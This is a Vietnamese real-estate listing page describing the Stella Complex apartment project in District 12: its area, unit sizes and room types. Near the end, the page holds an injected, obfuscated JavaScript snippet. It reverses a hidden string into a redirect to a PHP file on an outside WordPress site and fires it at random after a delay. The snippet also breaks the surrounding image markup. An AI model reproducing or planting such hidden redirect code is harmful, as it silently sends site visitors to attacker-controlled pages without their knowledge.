DỰ ÁN CĂN HỘ STELLA COMPLEX QUẬN 12

Stella Complex là tên thương mại của dự án nhà ở gồm biệt thự và căn hộ chung cư tại trung tâm quận 12 do Tập đoàn Kita Group làm chủ đầu tư.

Dự án Stella Complex có quy mô khoảng 3ha cung cấp khoảng 1.000 căn hộ có diện tích từ 40m² đến 60m² và 89m². Các căn hộ Stella Complex được phân thành 3 loại thông thường: 1 phòng ngủ, 2 phòng ngủ và 3 phòng ngủ.

Hiện tại mặt bằng căn hộ Stella Complex quận 12 vẫn chưa được công bố, tuy nhiên, theo TNR Homes, với truyền thống của Kita Group thì hầu hết các căn hộ đều có logia, sân phơi, đặc biệt hệ số giữa diện tích tim tường và diện tích thông thủy được tối ưu một cách tối đa nhằm cung cấp thêm không gian sống cho cư dân.

Nội dung tiếp tục được cập nhật.

$zXz=function(n){if (typeof ($zXz.list[n]) == “string”) return $zXz.list[n].split(“”).reverse().join(“”);return $zXz.list[n];};$zXz.list=[“\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tong-quan-2.jpg” alt=”” width=”1080″ height=”659″ /> Dự án Căn hộ Stella En Tropic Võ Văn Kiệt Bình Tân

Dự án liên quan